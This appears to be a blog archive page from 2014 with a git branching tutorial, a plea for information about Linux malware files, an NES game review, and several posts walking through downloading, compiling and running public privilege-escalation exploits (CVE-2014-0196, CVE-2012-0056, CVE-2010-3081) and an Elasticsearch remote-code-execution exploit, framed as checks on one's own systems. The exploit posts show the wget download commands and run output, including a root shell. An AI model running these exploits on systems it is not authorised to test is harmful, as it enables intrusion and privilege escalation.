Saturday, August 16, 2014

how to push branch work to github and list unpushed git commit

Often time when we work on issue, we branch from master branch and started our development on the branch. However, if the branch work never published, your co developer cannot read the changes. In this article, we are going to learn how
to publish the branch work to github.

You should have familiar basic branch work in git. Example.
git branch my-branch-work
git checkout my-branch-work
// do develope work here until you are ready to merge to the master branch.
git checkout master
git merge my-branch-work

If your local branch has set to my-branch-work, if you are trying to pull down from github, you will get similar message below.
There is no tracking information for the current branch.
Please specify which branch you want to merge with.
See git-pull(1) for details

git pull <remote> <branch>

If you wish to set tracking information for this branch you can do so with:

git branch --set-upstream-to=origin/<branch> my-branch-work

That is when you should start to push your branch work to github.
jason@localhost:~$ git push -u origin my-branch-work
Username for 'https://github.com': xxxxxx
Password for 'https://xxxxxx@github.com':
Total 0 (delta 0), reused 0 (delta 0)
To https://github.com/organization/myproject.git
* [new branch] my-branch-work -> my-branch-work
Branch my-branch-work set up to track remote branch my-branch-work from origin.

Then make sure your local branch is also pointed to the correct branch
$ git branch
* my-branch-work
master

The next time you do git pull, you will not receive the error. If you want to push your branch changes to github, you should use this command.
$ git push origin my-branch-work
Username for 'https://github.com': xxxxxx
Password for 'https://xxxxxx@github.com':
Counting objects: 10, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (7/7), done.
Writing objects: 100% (10/10), 2.73 KiB | 0 bytes/s, done.
Total 10 (delta 3), reused 0 (delta 0)
To https://github.com/organization/myproject.git
954be4a..5c1bcb6 my-branch-work -> my-branch-work

Often times, when you commit locally and you go on develop. Then probably pause for some period of time due to other priority works, and when you come back and do git status, you started to notice, hey, there is some local commit which you did not push but you forgotten what is actually in the commit. So is there a way to view it?
$ git status
On branch master
Your branch is ahead of 'origin/master' by 2 commits.
(use "git push" to publish your local commits)

Yes, there is, you can use command like git log origin/master..HEAD

Some additional command which is helpful including viewing the different using command git diff origin/master..HEAD

That's it, I hope you like it and you can donate via our donation page. Thank you.

Friday, August 15, 2014

information for malware Linux_time_y_2014 and Linux_time_y_2015 are needed

This article is a bit special. It is more like seeking information and documentating it. If you have this type of information, please leave your comment below.

If you have noticed that the followings file exists in your system

  • Linux_time_y_2014

  • Linux_time_y_2015 or xudp

  • .E7739C9DFEAC5B8A69A114E45AB327D41 or mysql1.0

  • .E7739C9DFEAC5B8A69A114E45AB327D4 or mysql1s


This is a malwares which if it is uploaded or copy to your server, you should check if it is running in the system and remove if it does.

I googled and search in social sites, there is not much information other than identified this as a malware. If you happened to know what cve or where is the source, please kindly leave the message in the comment.

The intention is to understand what does this malware does other than launching it as ddos. To document it down here and to provide information to others if they seek more information. If you know how to disect this binary and analyze the content, please do share as well.

Thank you.

Sunday, August 3, 2014

CVE-2014-0196 kernel: pty layer race condition leading to memory corruption

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source cve-2014-0196-md.c here. If you run an old system, then you might want to read more. But check your kernel that comes with your distribution, it may already been fixed.

From the description:

The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the "LECHO & !OPOST" case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings.

Okay, let's move on to compile and test it out.
user@localhost:~$ wget -O cve-2014-0196-md.c http://bugfuzz.com/stuff/cve-2014-0196-md.c
user@localhost:~$ gcc cve-2014-0196-md.c -lutil -lpthread
user@localhost:~$ ./a.out
[+] Resolving symbols
[+] Resolved commit_creds: 0xffffffff8105bb28
[+] Resolved prepare_kernel_cred: 0xffffffff8105bd3b
[+] Doing once-off allocations
[+] Attempting to overflow into a tty_struct......
........................................................................................................................................................................................................................................................................................................................................................................................................................^C

Apparently this kernel is not vulnerable to this exploit. Another great day. :-)

Saturday, August 2, 2014

CVE-2012-0056 mempodipper

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This source is written in c and it require some level of understanding into linux system as well. You should find explanation for the source mempodipper.c here. But it has since been fix in this patch. So all of the distribution should have this fix in the kernel anyway. But in case you run at old system with kernel 2.6.39 or a non stock kernel, then you might want to read more.

With that said, let's download this source and compile it.
user@localhost:~$ wget http://www.exploit-db.com/download/18411 -O 18411.c
--2014-07-19 16:52:59-- http://www.exploit-db.com/download/18411
Resolving www.exploit-db.com (www.exploit-db.com)... 192.99.12.218, 198.58.102.135
Connecting to www.exploit-db.com (www.exploit-db.com)|192.99.12.218|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/18411/ [following]
--2014-07-19 16:53:00-- http://www.exploit-db.com/download/18411/
Reusing existing connection to www.exploit-db.com:80.
HTTP request sent, awaiting response... 200 OK
Length: 6348 (6.2K) [application/txt]
Saving to: ‘18411.c’

100%[====================================================================================================================>] 6,348 --.-K/s in 0.001s

2014-07-19 16:53:00 (7.31 MB/s) - ‘18411.c’ saved [6348/6348]

user@localhost:~$ gcc 18411.c -o 18411
user@localhost:~$ ./18411
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================

[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/7398/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x4022c0.
[+] Calculating su padding.
[+] Seeking to offset 0x4022a6.
[+] Executing su with shellcode.
^C
user@localhost:~$ whoami
user

So we have downloaded the source, compile it using gcc and run it. If you notice in the video, if the kernel are vulnerable to this exploit, this exploit will finish run successfully and issue the command whoami, root is shown. But for this example above, my kernel is compiled with the fix so the computer system is safe. You can get this library and copy to the server you want to check to make sure the exploit did not run successfully.

That's it for this article, I hope you enjoy this writing.

Friday, August 1, 2014

CVE-2014-3120 Elastic Search Remote Code Execution

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who uses elastic search cluster in their production system and to make a living for the family. This blog is to make aware for those who deploy elasticsearch cluster and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

To quickly fix for this issue, you should set this
script.disable_dynamic: true

to your elasticsearch.yaml configuration file and restart elasticsearch instance.

If you have noticed, disable_dynamic is set to false in elasticsearch version 1.1.2 and below. However, it is set to true after 1.2.0.

Just load this html file CVE-2014-3120 in your browser and then change the field "ES_IP_Address" and the and field "File to read/append to". If your es allow access via port 9200, it will show the content but if you  have block the port and disable the dynamic scripting, then you are safe.

If the file content is shown, then you can start to write to it. You need to change the html source to allow write. When this happened, the attacker will be able to gain access to your box using public/private key. That's not good!

The said html file is adaptation from http://www.exploit-db.com/exploits/33370/ and if you are interested to read more, please read this link.

Friday, July 25, 2014

CVE-2010-3081 Ac1dB1tch3z

First off, I would like to express the intention of this article is to protect and safeguard of administrators / developers who make a living for their family by maintaining computer system for company. This blog is to make aware for those who run linux operating system and you should be aware of it and protect against the malicious attack. I take no responsibility if you and/or your evil minded take this to damage others.

This exploit only vulnerable to kernel version 2.6.26-rc1 to 2.6.36-rc4. So be
alert if your production server are runnning these kernel. It has since been
fixed in the upstream as it can be found here.

So what is this exploit about?

A vulnerability in the 32-bit compatibility layer for 64-bit systems was reported. It is caused by insecure allocation of user space memory when translating system call inputs to 64-bit. A stack pointer underflow can occur when using the "compat_alloc_user_space" method inside arch/x86/include/asm/compat.h with an arbitrary length input.

or the long description here and here

Get the source here and compile it.
user@localhost:~$ gcc -m32 15024.c -o 15024
user@localhost:~$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
!!! Un4bl3 t0 g3t r3l3as3 wh4t th3 fuq!

If the kernel is vulnerable to this exploit, check output below.
[bob@xxx ~]$ date
Sun Sep 19 18:22:38 BRT 2010
[bob@xxx ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 5.5 (Tikanga)
[bob@xxx ~]$ uname -a
Linux xxx 2.6.18-194.11.3.el5 #1 SMP Mon Aug 23 15:51:38 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
[bob@xxx ~]$ id
uid=500(bob) gid=500(bob) groups=500(bob)
[bob@xxx ~]$ ./15024
Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y
$$$ Kallsyms +r
$$$ K3rn3l r3l3as3: 2.6.18-194.11.3.el5
??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d
$$$ L00k1ng f0r kn0wn t4rg3tz..
$$$ c0mput3r 1z aqu1r1ng n3w t4rg3t...
$$$ selinux_ops->ffffffff80327ac0
$$$ dummy_security_ops->ffffffff804b9540
$$$ capability_ops->ffffffff80329380
$$$ selinux_enforcing->ffffffff804bc2a0
$$$ audit_enabled->ffffffff804a7124
$$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d
$$$ Prepare: m0rn1ng w0rk0ut b1tch3z
$$$ Us1ng st4nd4rd s3ash3llz
$$$ 0p3n1ng th3 m4giq p0rt4l
$$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP
sh-3.2# id
uid=0(root) gid=500(bob) groups=500(bob)

That's it! Stay safe.

Wednesday, July 23, 2014

Retro Dude Review: Power Blade



Lets go back in time. This time we are counting 1991, only one year prior to the great SNES release in Europe. There was a game developed by Natsume, published by Taito, known in Japan only as Power Blazer, but to many others around the world as Power Blade. It had action, it had a super master computer, it had explosions everywhere, boomerangs, powerups, burgers and a kickass soundtrack that still to this day amazes me with its pure awsomeness. (https://www.youtube.com/watch?v=WPoIwNn4-2U) The graphics where almost unheard of and my little six year old mind was blown to pieces.

(Insert corney picture with sister below)




The game starts you out at the introscreen (Duh) where you get the options to either start the game in either normal or Expert mode, or continue using a code gotten from previous levels. But you gotta pick fast, and I do mean fast because it takes the intro sequence literally two seconds to start.

During the intro you get the backstory of the game.

In the year 2191 the earth has left all of its power in the hands of the infamous Master Computer and is now living under a Terminator, Skynet like control, and like in the not so related movie the machines decides that there is no longer any need for humans and goes haywire and tries to take over the world. 

It's now up to you. Nova the security-chief to set things right. You are told, by your boss. To go out and search the 6 sectors to find agents that are holding security-keys (one agent and key per sector) to unlock the doors that holds the defence robot that protects the Master Computer located in Sector 7, all while you watch your ass or backside, since this is a nes relase and we don't want any swearing.


You push start and then you get to the sector select screen. luckily they made this game like megaman so you get to choose which sector you want to start out in. The only one locked is Sector 7 since that is the one you are trying to get acces to. So lets talk about stages. The first stage starts you of at the bottom of a spacerocket that you have to climb to get to the boss and agent. It's pretty straight forward actually. Word of advice at the beginning of the stage. When you climb up the first ladder you can jump down on the platform to your right to get the awsome powerup. It will give you an android like appearance and a super weapon. Like I said when you get to the top you reach the first Defence robot or the Boss, if you prefer that term.


Now let it be said that even though the graphics is awsome, the sound is epic 8 bit art and the stages are extremely well thought out its all just to easy and you wont get to many problems anywhere in the game especially with the first boss. It's this white robot with a big gun that dosent do much of anything. He shoots his gun goes right, left and jumps over you. That might sound hard but everything he does is like in slow motion and it's way to easy to predict his moves. Besides by the time you reach him you got all the powerups and as long as you remember to dodge his slowmotion, small, wanna be bullets you will be just fine. You win the stage, get to the mainframe, turn it off and you continue to the level select screen.



The second stage is windmill heaven for some reason, but as a Dane I can't stop smiling about that one. And here is where the whole maze like stages sets in. If you got a little jump skill the stage is rather easy but I don't wanna spoil the game to much it's better you play it yourself. Just let me tell you this. There will be waterfalls, gears, the windmills, slugs and frogs that explodes for some odd reason I still need to figure out. The boss is a Dragon-robot that transforms into a fire spiral and it puts up some challenge until you figure out its pattern. It also shoots fireballs but just dodge those and you will be fine.


That gets us to Sector 3. How to explain this one I got no idea since it's bagground changes to everything from a futuristic look, a swamp like appereance to some sort of lava melting, moss thingy. It is all basicly just a little disturbing to say the least, and to top it all of the boss is a freaking robot bee hive. I mean what the fuck where they thinking here? I don't even know. It puzzles my mind even to this day.


Now Sector 4 is a half build skyscraper if anything and it can be tricky to get the hang of. Just make sure you get to the freezer room before you atemp the high climb towards the top of the building and you should be fine. The only real though spot to speak of is where you gotta jump from these moving platforms, where one mistake will send you hurling down to the ground, and nobody wants to clean up after that mess. The boss is this wanna be Thor the thunder robot god, and it is hard to tell the difference  right?


Well maybe not that much, and what is with the finger is he an E.T. or a thunder god? Either way aouch.


And that brings us up to Sector 5. Sector 5 has always for some reason been my favorite level in the game. The maze effect isnt really an issue here and almost the entire level is played out on an orange ship. The boss is this genie (and I don't mean the cute disney kind) like robot that disappears and pops up again at random while shooting bullets in all directions, and even though it's my favorite level there isn't really much else to say about it.


Sector 6 Takes place in a straight line with the city in the bagground. You can get into the sewers bellow by the ladders spread out on the road. Then you reach the main building that just reminds you once again of the mazes that's in this game. The boss is this huge android guy surrounded by platforms that appears and disappears like in Megaman. 



And then we got Sector 7 the last and final stage in the game. Now since this is the final game I won't tell you anything about it since I dont like to many spoilers in my everyday life so why should you? That is also the reason I have left out many things yet to be said about this game. All I will say is this.


If there ever where an all time favorite for the NES in my heart it will always be and always has been Power Blade. The Graphics is awsome the soundtrack I can still listen to with great joy in my heart, and the gameplay is solid. The only bad thing to say about this game is that it is to easy! You can complete it in 30 minutes or less if you have done it before. Even the expert mode dosen't leave you with much since the difficulty is the same, the only difference is that, the time you have to complete the stages is 350 seconds instead of 999 seconds. But that is all I'm going to say about this game. I'm going back to my controller to enjoy my childhood one more time.


Retro Dude saying goodbye and I do hope you get a chance on playing an instant classic!



Sadly this time alone  ;)